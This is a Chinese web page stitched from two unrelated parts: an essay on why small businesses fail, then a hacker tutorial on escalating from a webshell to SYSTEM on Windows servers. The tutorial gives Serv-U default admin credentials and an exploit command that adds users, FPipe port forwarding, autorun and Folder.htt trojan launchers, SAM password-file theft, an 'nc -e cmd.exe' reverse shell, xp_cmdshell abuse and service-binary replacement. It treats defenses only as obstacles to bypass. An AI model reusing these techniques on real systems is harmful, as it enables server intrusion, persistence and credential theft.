艾锑知识 | 服务器 提权方法大全
2020-03-10 15:13 作者:艾锑无限 浏览量:
中小微企业生存的五大法则
为什么中小微企业的存活率这么低呢?
第一,创业失败创始人难辞其咎,我们在学校里是没有一堂课是教如何创业,如何才能创业成功,即使现在有很多大学尝试着在学校开办一些创业的课程,也不系统,更不专业,因为创业是一件极其复杂的工作,是需要多项技能的集合以及熟练的运用才有可能应对突如其来的变化,创业初期就像一艘孤独的小船面对波涛汹涌的大海,但船长从来都没有开过任何一艘船驶出过海港,风浪来的时候,只有慌张和恐惧,最后被海水吞没.
第二,创业失败是价值观不统一,方向不一致,团队不团结,风平浪静,风和日丽,其实没什么关系,大家都在享受阳光带来的美好和快乐,只有遇到风浪,生死攸关或个人利益受到极大冲突时,人性的弱点才会突显,当每个人只盯着个人得失或眼光短浅时,如果这个时候创始人没有力挽狂澜,强大的信念和人格魅力来一统所有人的行动准则,在危机中迟疑,就等于在死神面前跳舞,当年阿里的“中国供应商”客户涉嫌欺诈事件,如果不是马云明察秋毫,当即立断,我相信也不会有今天阿里世界霸主的地位.
第三,创业失败是固步自封,看不见高山,如果我们只能看见自己的山最高,没有走出去,没有学习的心态,没有敬畏之心,很快时代就会把我们淘汰,当年的诺基亚,柯达就是最好的例子.无论企业多大,都要有一颗创业的心,永远相信还能做的更好,还可以再创新,还会想出其它的可能性.真正的对手不在外面,而在我们心中,心中无敌,才能无敌于天下.
第四,创业失败是误解了”客户是上帝”,上帝并不是时时都知道自己要什么,我们不能只限于客户表面的表达就决定了他们的需求,很多企业死就死在客户的假需求中,看起来好像是客户追求的产品,需要的服务,但实际当产品生产出来,当服务送到客户面前,并没有真正吸引到客户的注意,愿意为此而买单,核心本质就是我们曲解了”客户是上帝”这句话,真正的上帝是不会当自己是至高无上的,也不会对品质无底限的追求,更不会对服务没有节制要求,其实客户就是客户,他们绝大部分人都是普通人,有着普通人的欲望,有着普通人的不满足,有着普通人想要花更少的钱却要得到更多的意识,他们的只忠诚于更便宜更高的品质,这一切都是企业需要认知到的本质,不然你的”上帝”是不会为你持续付费的.
第五,创业失败是讲多了人情讲少了制度,公司小,三五个人可以不需要任何制度,甚至也不需要任何系统,因为那时彼此联结非常深,情感的能量可以唤醒每个人的斗志和决心 ,但当企业发展到几十个人甚至几百个人时,那种深深的联结感很难在感受到,人性的弱点就会被环境所唤醒,就会被利益所绑架,就会被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最终是服务于人,只有促进发展的制度,可能激励人性向善的制度才能长久, 反之亦然.
如果你想想创立一家公司?
如果你是一家刚刚开始创业的公司?
如果你现在在创业的过程中遇到了挑战?
结合上面的五大常见创业失败,我们总结出来了五个可以让你有更大成功机率的法则,可以让你活的更久一些,但不保证你一定成功,因为事事变化,因缘和合,万法无常,只能随机而变.
第一法则:准备自己
创始人需要自我审视,首先要准备好自我牺牲的精神,要做好大海有风暴的思想准备,其次利用一切可以实践的机会去锻炼自己的综合能力,不仅仅相信前辈和书本的声音,更需要相信实战后带来的思考和反思.即要有远大的理想和抱负,又要有脚踏实地做好每一件事的决心.
第二法则:认识自我
创始人要极早的认识自我,想清楚为什么要创业比创业更重要,清晰明确的了解自己的价值是什么?什么是自己会坚持的,什么是自己抗拒的,混乱的价值观就会吸引五花八门的人,企业内部的斗争都是创始人自己思想的斗争,初创企业所呈现出来的一切现象都是创始人内在的显化.当年阿里快速成长,内部也出现了一系列的问题,但极其智慧的马云没有去解决这些问题,反而把自己关在道观中整整7天,最后终于想明白了三个问题:我要什么,我有什么,我要放弃什么,当他想清晰这三个问题后,并向全公司传递出来,最后所有那些纷繁复杂的问题都不解自明.
第三法则:持续打开
创始人的天花板就是企业的天花板,企业无法突破,就是创始人没有突破自己,突破其实不容易,因为固有的观念就像万里长城一样,非一日之功,是多少个春夏秋冬,严寒酷暑的积累和沉淀,这些不是没有价值,而是帮助过我们创了价值,让我们来到了今天这一步,但如果我们期望有一个更大的世界,就需要放下它们,放下我们曾经一直的坚持和执着,打开自己,让自己接纳一个全新的可能性,也许过不了多久,我们又会把这些新的东西奉为圭臬但只要我们还想看到一个更大的可能性,就需要再次打开自己,重新建立认知,我们一生都是在打开和重建过程中,直到生命的终结,又一切回归原点.
第四法则:回归本质
创始人刚开始需要和团队一起参与战斗,甚至做具体细节工作,因为初创需要激情来点燃,而创始人是这个团队最有激情的一个人,初创团队需要有人带动去点燃更大的燃料.当所有团队和部门走向正轨时,创始人更大的价值是深度的思考,有效的区分,精神的引领和正确的选择.
企业越来越大,事情就会越来越多,如果没有一个清醒的大脑保持深度的思考,就像让企业很多人很忙,忙是一种现象,并不代表有价值,只有透过深度思考发现事物的本质,才知道忙什么才是最重要的,
懂得有效的区分是一个领导者必须掌握的能力, 《尼布尔的祈祷文》说:”上帝,请赐予我平静,去接受我无法改变的。给予我勇气,去改变我能改变的,赐我智慧,分辨这两者的区别。”只有具备分辨的智慧,才不会让自己误入歧途.
创始人要有强大的精神力量,让所有员工感受到这股力量,因为所有的成功都离不开一个伟大的精神领袖,就像苹果的乔布斯,微软的比尔盖茨和阿里的马云.
选择比努力更重要,这句话告诉我们顺势而为的选择可以让我们在同样的努力情况下获得不同的结果,如何才能具备这样明智选择的能力呢,强大的深度思考能力和有效的区分能力就可以帮到我们看见正确的选择.
第五法则:创造系统
创始人是人,是人就会有七情六欲,就会有生老病死,就会有悲欢离合,这些人性的因素会让我们很不稳定,但企业能持久有效的运转一定是在稳定的能量下运行,所以不能始终靠人来推动,企业想要活的久一定是有内生的系统,只有建立一个自动运转的系统才能保持稳定健康的成长.
艾锑知识 |服务器 提权方法大全
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。
下面我们就进入主题,对webshell的提权方法!
首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。
在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:
1。pcanywhere的提权方法
pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
2。Serv-U提权方法
Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!
a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服务器支持PHP)
c:\PHP(如果服务器支持PHP)
上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。
不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:
防止办法和对策:
一般防止方法:设置目录权限,通过去掉Web目录iusr用户的执行权限来防止使用Webshell来运行Exp程序。
对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp,这种目录还有x:\php,x:\perl等,因为这种目录都是
everyone完全控制的。有些主机还支持php,pl,aspx等,这简直就是服务器的Serv-U灾难,^_^,运行程序更加方便。
高级一点的防止办法:修改Serv-u管理端口,用Ultraedit打开ServUDaemon.exe查找B6AB(43958的16进制),替换成自己定义的端口比如3930(12345),打开ServUAdmin.exe找到最后一个B6AB替换成3930(12345),启动Serv-u,现在本地管理端口就成了12345了:
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下Exp编译,上传运行就好了,我修改了一个可以自定义端口的Exp,运行格式:
USAGE: serv-u.exe port "command"
Example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高级的防止办法:修改管理员名和密码,用Ultraedit打开ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等长度的其它字符就可以了,ServUAdmin.exe也一样处理。
对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装Serv-u都是使用默认目录C:\Program Files\Serv-U安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载ServUDaemon.exe,用Ultraedit打开分析一下,Serv-U的帐号密码就到手
了,修改Exp编译上传运行,我们又胜利了。
终极防御:
a.设置好目录权限,不要疏忽大意;
b.Serv-U最好不要使用默认安装路径,设置Serv-U目录的权限,只有管理员才能访问;
c.用我介绍的办法修改Serv-U的默认管理员名字和密码,喜欢的话端口也可以改掉。
d.serv-U管理端口定向转发法:这里需要使用的工具是FPipe.exe
我们要知道Serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到FPipe.exe,首先是将FPipe.exe上传至服务器中,然后再cmd下执行
Fpipe.exe -v -l 12345-r 43958 127.0.0.1
这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口
所以我们在本地安装一个Serv-u,
新建一个服务器,填入对方IP,
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
连接上后你就可以管理他的Serv-u了,剩下的操作就是执行上面提到的方法了!
===================================================
Serv-U的方法我就总结出这几个来,可能还有其他的方法我没有看到吧
不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序
不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。
Serv-U的提权文章就暂时先总结到这里,有更好的方法还请大家回复!
3.Autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可
制作一个Autoruan.inf文件.内容如下
[AutoRun]
open=bear.exe
bear.exe为木马程序,与autorun.inf放在同一目录下!
4。SAM破解方法: 进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解工具破解。
5。相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\Documents and Settings\All Users\「开始」菜单\程序\启动 写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。
6。NC的反弹提权:这里就要说NC的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234
7。conn等asp文件中泄漏SQL帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即可,连接上后就可以输入你想要的CMD命令了。
8。VNC的相关提权:VNC也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看台湾的一些服务器中有很多使用VNC的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:http://www.hxhack.org/Article/HTML/14184.html
还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。
9。desktop.ini与Folder.htt方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”></OBJECT> 然后你将
你的木马文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。
10。替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:
C:\>rename /?
重命名文件。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
例如替换c:\kv2004\kv.exe的进程
rename c:\kv2004\kv.exe bear.exe
然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等待对方重新起动机算机即可!
相关文章
IT电脑维护外包
关闭